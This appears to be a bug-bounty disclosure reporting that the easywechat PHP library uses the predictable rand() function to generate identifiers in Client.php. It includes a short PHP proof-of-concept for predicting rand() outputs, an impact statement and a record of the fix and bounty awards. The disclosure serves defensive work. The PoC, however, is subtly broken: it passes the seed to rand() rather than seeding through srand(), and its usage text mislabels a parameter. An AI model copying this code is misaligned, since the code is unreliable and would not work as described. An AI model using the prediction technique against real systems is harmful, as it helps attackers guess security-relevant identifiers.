Use of Predictable Algorithm in Random Number Generator in w7corp/easywechat

Valid

Reported on

Jun 28th 2021


✍️ Description

Insecure randomness errors occur when a function that can produce predictable values is used as a source of randomness in security-sensitive context. This code uses the rand() function to generate "unique" identifiers for the receipt pages it generates. In this case the function that generates weak random numbers is rand() in Client.php at line 47

🕵️‍♂️ Proof of Concept

//POC.php

#!/usr/bin/env php
<?php

if($argc < 3)
{
    print($argv[0] . ' <seed> <n>' . "\n");
    print('' . "\n");
    print('Parameters:' . "\n");
    print('  seed:   Seed to initialize rand() with' . "\n");
    print('  offset: Number of calls to rand() before printing the first');
    print(' output' . "\n");
    print('' . "\n");
    print('Output:' . "\n");
    print('  <offset>\'s call to rand() and <offset+227>\'s call');
    print(' to rand()' . "\n");
    exit();
}

rand($argv[1]);
for($i=0;$i<$argv[2];$i++)
    rand();

print rand() . " ";
for($i=0;$i<226;$i++)
    rand();
print rand() . "\n";

💥 Impact

The random number generator implemented by rand() cannot withstand a cryptographic attack. Because rand() is a statistical PRNG, it is easy for an attacker to guess the strings it generates.

Occurrences

References

Akshay Jain submitted a
a year ago
Akshay Jain
a year ago

Researcher


For Patch, Pull this: https://github.com/w7corp/easywechat/pull/2131

安正超 validated this vulnerability a year ago
Akshay Jain has been awarded the disclosure bounty
The fix bounty is now up for grabs
安正超 confirmed that a fix has been merged on f65c5e a year ago
Akshay Jain has been awarded the fix bounty
to join this conversation